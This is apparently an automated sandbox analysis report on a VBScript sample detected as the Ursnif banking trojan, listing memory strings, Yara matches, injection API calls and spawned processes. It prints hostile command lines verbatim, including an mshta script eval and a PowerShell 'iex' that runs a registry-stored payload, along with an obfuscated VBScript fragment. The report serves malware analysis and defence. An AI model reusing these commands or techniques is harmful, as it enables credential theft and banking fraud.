Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmp | String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmp | String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Source: C:\Windows\explorer.exe | Code function: 35_2_0612676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\explorer.exe | Code function: 35_2_0611FFCC NtMapViewOfSection,
Source: C:\Windows\explorer.exe | Code function: 35_2_0610CCA0 NtReadVirtualMemory,
Source: C:\Windows\explorer.exe | Code function: 35_2_0611AD14 NtQuerySystemInformation,
Source: C:\Windows\explorer.exe | Code function: 35_2_0611F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
Source: C:\Windows\explorer.exe | Code function: 35_2_0610BAB4 NtAllocateVirtualMemory,
Source: C:\Windows\explorer.exe | Code function: 35_2_06111AC4 NtQueryInformationProcess,
Source: C:\Windows\explorer.exe | Code function: 35_2_06113830 NtWriteVirtualMemory,
Source: C:\Windows\explorer.exe | Code function: 35_2_0611387C NtCreateSection,
Source: C:\Windows\explorer.exe | Code function: 35_2_0610B75C
Source: C:\Windows\explorer.exe | Code function: 35_2_0611F770
Source: C:\Windows\explorer.exe | Code function: 35_2_0612676C
Source: C:\Windows\explorer.exe | Code function: 35_2_061037B8
Source: C:\Windows\explorer.exe | Code function: 35_2_0612AFB8
Source: C:\Windows\explorer.exe | Code function: 35_2_06120034
Source: C:\Windows\explorer.exe | Code function: 35_2_0610C134
Source: C:\Windows\explorer.exe | Code function: 35_2_06119138
Source: C:\Windows\explorer.exe | Code function: 35_2_0610AE04
Source: C:\Windows\explorer.exe | Code function: 35_2_0612BEB0
Source: C:\Windows\explorer.exe | Code function: 35_2_061226B4
Source: C:\Windows\explorer.exe | Code function: 35_2_06109F98
Source: C:\Windows\explorer.exe | Code function: 35_2_061117B8
Source: C:\Windows\explorer.exe | Code function: 35_2_06105474
Source: C:\Windows\explorer.exe | Code function: 35_2_0610D460
Source: C:\Windows\explorer.exe | Code function: 35_2_06119CB0
Source: C:\Windows\explorer.exe | Code function: 35_2_061294B8
Source: C:\Windows\explorer.exe | Code function: 35_2_0612A4BC
Source: C:\Windows\explorer.exe | Code function: 35_2_0611D4A8
Source: C:\Windows\explorer.exe | Code function: 35_2_06110CC0
Source: C:\Windows\explorer.exe | Code function: 35_2_061274CC
Source: C:\Windows\explorer.exe | Code function: 35_2_0610BCF8
Source: C:\Windows\explorer.exe | Code function: 35_2_06113CE0
Source: C:\Windows\explorer.exe | Code function: 35_2_0612B516
Source: C:\Windows\explorer.exe | Code function: 35_2_06106D08
Source: C:\Windows\explorer.exe | Code function: 35_2_0611B520
Source: C:\Windows\explorer.exe | Code function: 35_2_0611452C
Source: C:\Windows\explorer.exe | Code function: 35_2_06111D94
Source: C:\Windows\explorer.exe | Code function: 35_2_06123208
Source: C:\Windows\explorer.exe | Code function: 35_2_06128224
Source: C:\Windows\explorer.exe | Code function: 35_2_06107320
Source: C:\Windows\explorer.exe | Code function: 35_2_06108B5C
Source: C:\Windows\explorer.exe | Code function: 35_2_06118B4C
Source: C:\Windows\explorer.exe | Code function: 35_2_06119380
Source: C:\Windows\explorer.exe | Code function: 35_2_06102BC8
Source: C:\Windows\explorer.exe | Code function: 35_2_0610203C
Source: C:\Windows\explorer.exe | Code function: 35_2_0611B040
Source: C:\Windows\explorer.exe | Code function: 35_2_06126064
Source: C:\Windows\explorer.exe | Code function: 35_2_0612E080
Source: C:\Windows\explorer.exe | Code function: 35_2_061220F8
Source: C:\Windows\explorer.exe | Code function: 35_2_0612F940
Source: C:\Windows\explorer.exe | Code function: 35_2_06111174
Source: C:\Windows\explorer.exe | Code function: 35_2_061291A0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
Source: 0k4Vu1eOEIhU.vbs | Initial sample: Strings found which are bigger than 50
Source: gf33rpcq.dll.29.dr | Static PE information: No import functions for PE file found
Source: 1b1iaete.dll.25.dr | Static PE information: No import functions for PE file found
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\explorer.exe | Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe | Section loaded: msimg32.dll
Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winVBS@29/40@7/1
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{4AA7BD5B-21EE-0C31-FB1E-E5005F32E934}
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1'
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000019.00000002.332931737.00000216A5770000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.342161112.00000193E6DB0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000023.00000000.374046960.000000000E1C0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000023.00000000.374046960.000000000E1C0000.00000002.00000001.sdmp

            Data Obfuscation:

            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")REM highwaymen Cinderella. 2193015 gummy market surjection sculptural warty cotman cliff ketch stroke medial gaslight mandate papyrus calcareous colonist Pearson expulsion Rembrandt krypton Huber debility geodetic vocabularian sour roe inoculate heathenish hearty crystalline oldster Tamil price masochist Bruce ecumenist puree McLeod divorce Muenster landslide committed inhabitation sixfold aluminate larceny pragmatism Sturbridge659 octogenarian cress. campground Giuliano lute Taipei valedictorian Koppers cit. 9962460 celebrant liaison posable shutdown mobcap fit pore wapato. adipic readout Bailey brokerage plausible intoxicant Copernican parsimonious entice razorback Canis. foamflower increase inception requisite contemporaneous switchboard. heaven. 1854466 talky Siegfried, phylogenetic weasel asymmetry phloem ingrained Moiseyev TILpy.DeleteFile WScript.ScriptFullName, TrueEnd FunctionFunction DJTznna()on error resume nextIf (InStr(WScript.ScriptName, cStr(262827114)) > 0 And NEdZn = 0) ThenExit FunctionREM EEOC taxonomy. guanidine oncoming telephonic uttermost silken Afrikaans Dominique southern Menelaus Dortmund garter804. repellent burglary Sergei job dad tram bonnet. 4263459 Liz accordant fascism grapple prodigal polytope ascomycetes. municipal katydid throaty youngster. Jeremiah Sheehan squall, ostrich invigorate lossy. scops exempt retrospect, 82121 erudite PhD Helmholtz End IfREM seaside melanoma slaughter gavotte turbidity nob, infirmary promulgate cultural. 
